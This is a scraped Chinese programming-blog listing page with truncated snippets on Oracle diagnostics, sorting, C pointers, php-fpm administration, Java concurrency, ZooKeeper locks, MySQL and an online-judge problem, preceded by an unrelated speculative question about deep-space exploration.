          如果我们必须获得某种地球上没有的矿石,才能够进行某些能量输出装置的设计和建造,而要获得这种矿石,又必须首先进行深空探测,而要进行深空探测,又必须获得这种能量输出装置,这个矛盾的循环,会导致地球联盟在与宇宙文明建立关系的时候,陷入困境       怎么办呢?  
  • Oracle 11g新特性:Automatic Diagnostic Repository daizj oracleADR
    Oracle Database 11g的FDI(Fault Diagnosability Infrastructure)是自动化诊断方面的又一增强。 FDI的一个关键组件是自动诊断库(Automatic Diagnostic Repository-ADR)。 在oracle 11g中,alert文件的信息是以xml的文件格式存在的,另外提供了普通文本格式的alert文件。 这两份log文
  • 简单排序:选择排序 dieslrae 选择排序
    public void selectSort(int[] array){ int select; for(int i=0;i<array.length;i++){ select = i; for(int k=i+1;k<array.leng
  • C语言学习六指针的经典程序,互换两个数字 dcj3sjt126com c
    示例程序,swap_1和swap_2都是错误的,推理从1开始推到2,2没完成,推到3就完成了 # include <stdio.h> void swap_1(int, int); void swap_2(int *, int *); void swap_3(int *, int *); int main(void) { int a = 3; int b =
  • php 5.4中php-fpm 的重启、终止操作命令 dcj3sjt126com PHP
    php 5.4中php-fpm 的重启、终止操作命令: 查看php运行目录命令:which php/usr/bin/php 查看php-fpm进程数:ps aux | grep -c php-fpm 查看运行内存/usr/bin/php  -i|grep mem 重启php-fpm/etc/init.d/php-fpm restart 在phpinfo()输出内容可以看到php
  • 线程同步工具类 shuizhaosi888 同步工具类
    同步工具类包括信号量(Semaphore)、栅栏(barrier)、闭锁(CountDownLatch)   闭锁(CountDownLatch) public class RunMain { public long timeTasks(int nThreads, final Runnable task) throws InterruptedException { fin
  • bleeding edge是什么意思 haojinghua DI
    不止一次,看到很多讲技术的文章里面出现过这个词语。今天终于弄懂了——通过朋友给的浏览软件,上了wiki。  我再一次感到,没有辞典能像WiKi一样,给出这样体贴人心、一清二楚的解释了。为了表达我对WiKi的喜爱,只好在此一一中英对照,给大家上次课。   In computer science, bleeding edge is a term that
  • c中实现utf8和gbk的互转 jimmee ciconvutf8&gbk编码
    #include <iconv.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> int code_c
  • 大型分布式网站架构设计与实践 lilin530 应用服务器搜索引擎
    1.大型网站软件系统的特点? a.高并发,大流量。 b.高可用。 c.海量数据。 d.用户分布广泛,网络情况复杂。 e.安全环境恶劣。 f.需求快速变更,发布频繁。 g.渐进式发展。 2.大型网站架构演化发展历程? a.初始阶段的网站架构。 应用程序,数据库,文件等所有的资源都在一台服务器上。 b.应用服务器和数据服务器分离。 c.使用缓存改善网站性能。 d.使用应用
  • 在代码中获取Android theme中的attr属性值 OliveExcel androidtheme
    Android的Theme是由各种attr组合而成, 每个attr对应了这个属性的一个引用, 这个引用又可以是各种东西.   在某些情况下, 我们需要获取非自定义的主题下某个属性的内容 (比如拿到系统默认的配色colorAccent), 操作方式举例一则: int defaultColor = 0xFF000000; int[] attrsArray = { andorid.r.
  • 基于Zookeeper的分布式共享锁 roadrunners zookeeper分布式共享锁
    首先,说说我们的场景,订单服务是做成集群的,当两个以上结点同时收到一个相同订单的创建指令,这时并发就产生了,系统就会重复创建订单。等等......场景。这时,分布式共享锁就闪亮登场了。   共享锁在同一个进程中是很容易实现的,但在跨进程或者在不同Server之间就不好实现了。Zookeeper就很容易实现。具体的实现原理官网和其它网站也有翻译,这里就不在赘述了。   官
  • 两个容易被忽略的MySQL知识 tomcat_oracle mysql
    1、varchar(5)可以存储多少个汉字,多少个字母数字?   相信有好多人应该跟我一样,对这个已经很熟悉了,根据经验我们能很快的做出决定,比如说用varchar(200)去存储url等等,但是,即使你用了很多次也很熟悉了,也有可能对上面的问题做出错误的回答。   这个问题我查了好多资料,有的人说是可以存储5个字符,2.5个汉字(每个汉字占用两个字节的话),有的人说这个要区分版本,5.0
  • zoj 3827 Information Entropy(水题) 阿尔萨斯 format
    题目链接:zoj 3827 Information Entropy 题目大意:三种底,计算和。 解题思路:调用库函数就可以直接算了,不过要注意Pi = 0的时候,不过它题目里居然也讲了。。。limp→0+plogb(p)=0,因为p是logp的高阶。 #include <cstdio> #include <cstring> #include <cmath&
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他